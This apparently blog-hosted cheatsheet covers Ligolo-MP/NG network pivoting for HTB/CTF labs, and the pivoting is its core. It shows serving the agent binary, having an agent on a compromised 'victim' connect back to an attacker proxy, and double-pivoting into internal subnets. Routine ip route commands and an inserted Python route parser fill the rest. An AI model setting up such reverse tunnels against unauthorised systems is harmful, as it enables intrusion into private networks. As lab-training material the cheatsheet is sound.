Ligolo-MP/Ligolo-NG Cheatsheet

Installation

From Source

GitHub: Ligolo-MP (https://github.com/ttpreport/ligolo-mp)

git clone https://github.com/ttpreport/ligolo-mp
cd ligolo-mp
sudo make install
sudo ligolo-mp

From Release

Download the binary from the GitHub releases page, then:

# downloaded binary: ligolo-mp_linux_amd64
chmod +x ./ligolo-mp_linux_amd64
sudo ./ligolo-mp_linux_amd64

Dashboard overview

Flag markers (colored icons in the dashboard, not reproduced here) and their meaning:

Flag    Meaning
(icon)  Agent is connected, relay is down
(icon)  Agent is connected, relay is up
(icon)  Agent is disconnected, relay is down

Navigating the dashboard with TAB

CTRL+A  Admin panel
CTRL+N  Generate client binary
CTRL+T  Traceroute IP
CTRL+Q  Quit ligolo

Interfaces

This is a list of interfaces found on the compromised machine. It could be useful for easier navigation of internal networks: which interface to run a redirector on, which networks are potentially accessible via this particular session and so on.

Routes

The list of routes is here mainly for visibility: as already mentioned, the selection highlight is synchronized with sessions and redirectors, and the visual markers (the colored flags) give a good representation of the current state.

Its context menu allows deletion of the selected route.

Redirectors

This is functionally the same as the routes list, but represents redirectors.

Its context menu allows deletion of the selected redirector.

Local host

The IP 240.0.0.1 acts as the localhost IP of the host the agent runs on, i.e. traffic sent to 240.0.0.1 through the tunnel reaches that host's own 127.0.0.1 services.

Ligolo-NG

Resolving a listener error (port 11601 already in use)

A previous proxy instance still holding the port is the usual cause; find it and kill it.

$ sudo lsof -i :11601
COMMAND    PID USER FD   TYPE DEVICE SIZE/OFF NODE NAME
proxy   110838 root 3u  IPv6 393192      0t0  TCP *:11601 (LISTEN)
proxy   110838 root 7u  IPv6 374598      0t0  TCP kasemsh:11601->trilocor.local:51250 (ESTABLISHED)

$ sudo kill -9 110838

Download Essentials


# Agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip -O ligolo-ng_agent_0.8.2_windows_amd64.zip

# Proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz -O ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

# Updog (simple HTTP file server, Arch package)
sudo pacman -S python-updog

Use updog to share the agent.exe file


# On the attacker's box
updog -p 8080

Adding the tun interface

sudo ip tuntap add user root mode tun ligolo  # adding interface
sudo ip link set ligolo up                    # starting interface
sudo ip route list                            # checking routes
sudo ip link delete ligolo                    # to delete the interface

Starting our proxy

$ ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.8.2

ligolo-ng »

Note the WARN line: the default self-signed certificate domain 'ligolo' is a well-known indicator, which is exactly what the tool itself warns about.

On the target host


# Send the agent to the target, then start it
./agent -connect 10.10.14.14:11601 -ignore-cert -retry

Start your sessions


# List your sessions
ligolo-ng » session

# Select session
ligolo-ng » 1

# Start your session (tunnel)
ligolo-ng » start

# Show the agent's interfaces
ligolo-ng » ifconfig

Add your route for the target network


sudo ip route add 172.16.8.0/24 dev ligolo

Delete a conflicting route if traffic has problems

# e.g. a VPN route that overlaps the pivot network
sudo ip route del 192.168.98.0/24 dev tun0

Double Pivot

Add another logical interface

sudo ip tuntap add user root mode tun ligolo-double  # adding interface
sudo ip link set ligolo-double up                    # starting interface
sudo ip route list                                   # checking routes

Add a listener in Ligolo

# On the first agent's session: port 11601 on the first pivot is forwarded to the proxy on 127.0.0.1:11601
ligolo-ng » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
ligolo-ng » listener_list

On the victim's side

.\agent.exe -connect 172.16.139.10:11601 -ignore-cert -retry

Start the tunnel after the connection

# With the second agent's session selected, start its tunnel on the second interface (ligolo-double)
ligolo-ng » tunnel_start --tun ligolo-double

Add the route to the next subnet

sudo ip route add 172.16.6.0/24 dev ligolo-double

IP Route Management

View Current Routes

ip route list
ip route show
ip r      # Short form
route -n  # Alternative (older style, net-tools)

Add Specific Route

# Basic syntax
sudo ip route add <network> dev <interface>
sudo ip route add <network> via <gateway> dev <interface>

# Examples
sudo ip route add 172.16.5.0/24 dev pivotl
sudo ip route add 10.10.10.0/24 via 10.10.14.1 dev tun0
sudo ip route add 192.168.1.0/24 via 10.10.14.50 dev tun0

Delete Specific Route

# Single route delete
sudo ip route del <network> dev <interface>

# Examples
sudo ip route del 172.16.5.0/24 dev pivotl
sudo ip route del 192.168.29.0/24 dev wlan0
sudo ip route del 10.10.10.0/23 via 10.10.14.1 dev tun0

Delete All Custom Routes (Clean Reset)

# Method 1: Delete each route manually
sudo ip route del 10.10.10.0/23 via 10.10.14.1 dev tun0
sudo ip route del 10.10.14.0/23 dev tun0
sudo ip route del 10.129.0.0/16 dev tun0
sudo ip route del 172.16.5.0/24 dev pivotl
sudo ip route del 172.16.6.0/24 dev pivotl
sudo ip route del 172.17.0.0/16 dev docker0

# Method 2: Flush all routes for a specific interface
sudo ip route flush dev tun0
sudo ip route flush dev pivotl
sudo ip route flush dev docker0

# Method 3: Flush the entire routing table (DANGEROUS - will break networking!)
sudo ip route flush table main  # Don't use unless you know what you're doing

Restart Network Interface (Fresh Start)

# Restart VPN/Tunnel interface
sudo ip link set tun0 down
sudo ip link set tun0 up

# For any interface
sudo ip link set <interface> down
sudo ip link set <interface> up

# Or reconnect the VPN from scratch
sudo openvpn --config lab.ovpn  # Reconnect VPN

Network Service Restart

# Ubuntu/Debian
sudo systemctl restart networking
sudo systemctl restart NetworkManager

# Arch/Parrot
sudo systemctl restart NetworkManager

# Flush DNS cache too (if needed)
sudo systemd-resolve --flush-caches   # newer systemd: resolvectl flush-caches

Quick Commands for Your Scenario

# 1. Delete all pivot routes
sudo ip route flush dev pivotl

# 2. Delete VPN routes
sudo ip route flush dev tun0

# 3. Reconnect the VPN fresh
sudo openvpn --config academy.ovpn

# 4. Verify the clean state
ip route list

Understanding Route Components

10.10.10.0/23 via 10.10.14.1 dev tun0
│             │              │
│             │              └─ Interface to use
│             └─ Gateway IP (next hop)
└─ Destination network
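As an added example (not part of the original cheatsheet), the following parser splits `ip route list` output into the three components shown above, flags destinations that overlap across different interfaces (the usual reason pivot traffic takes the wrong tunnel, which the "delete a conflicting route" step addresses), and emits the per-route `ip route del` lines used in the manual cleanup section. The sample route table and the `ligolo`/`pivot` interface-name convention are constructed assumptions.

```python
import ipaddress
import re

# Constructed sample of `ip route list` output (assumption, not from the page):
# a lab VPN on tun0, two Ligolo tun interfaces, a Docker bridge and the LAN.
SAMPLE_ROUTES = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.10.0/24 dev ligolo scope link
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.14
172.16.5.0/24 dev ligolo scope link
172.16.6.0/24 dev ligolo-double scope link
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.50
"""

# Interface names we treat as pivot tunnels (assumed naming convention).
PIVOT_IFACE = re.compile(r"^(ligolo|pivot)")


def parse_routes(text):
    """Split each `ip route` line into destination / gateway / interface."""
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        dst = "0.0.0.0/0" if fields[0] == "default" else fields[0]
        if "/" not in dst:
            dst += "/32"  # host routes are printed without a prefix length
        route = {"dst": ipaddress.ip_network(dst, strict=False), "via": None, "dev": None}
        for key, value in zip(fields, fields[1:]):  # scan "via X" / "dev Y" pairs
            if key == "via":
                route["via"] = value
            elif key == "dev":
                route["dev"] = value
        routes.append(route)
    return routes


def pivot_routes(routes):
    """Routes that point at a pivot tunnel interface."""
    return [r for r in routes if r["dev"] and PIVOT_IFACE.match(r["dev"])]


def overlaps(routes):
    """(dst_a, dev_a, dst_b, dev_b) for destinations that overlap on different
    interfaces; the default route is ignored since it overlaps everything."""
    found = []
    for i, a in enumerate(routes):
        for b in routes[i + 1:]:
            if a["dst"].prefixlen == 0 or b["dst"].prefixlen == 0:
                continue
            if a["dev"] != b["dev"] and a["dst"].overlaps(b["dst"]):
                found.append((str(a["dst"]), a["dev"], str(b["dst"]), b["dev"]))
    return found


def cleanup_commands(routes):
    """The `ip route del` line for every pivot route, as in the manual cleanup."""
    cmds = []
    for r in pivot_routes(routes):
        via = f" via {r['via']}" if r["via"] else ""
        cmds.append(f"sudo ip route del {r['dst']}{via} dev {r['dev']}")
    return cmds
```

In the sample, 10.10.10.0/24 on ligolo sits inside the VPN's 10.10.10.0/23, which is the kind of overlap worth spotting before blaming the tunnel.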

Common Use Cases

HTB/CTF VPN Reset

# Kill the old VPN
sudo killall openvpn

# Clear old routes
sudo ip route flush dev tun0

# Reconnect fresh
sudo openvpn --config academy.ovpn

Pivoting Cleanup

# Remove all pivot routes
sudo ip route flush dev pivotl

# Remove the interface
sudo ip link del pivotl

This post is licensed under CC BY 4.0 by the author.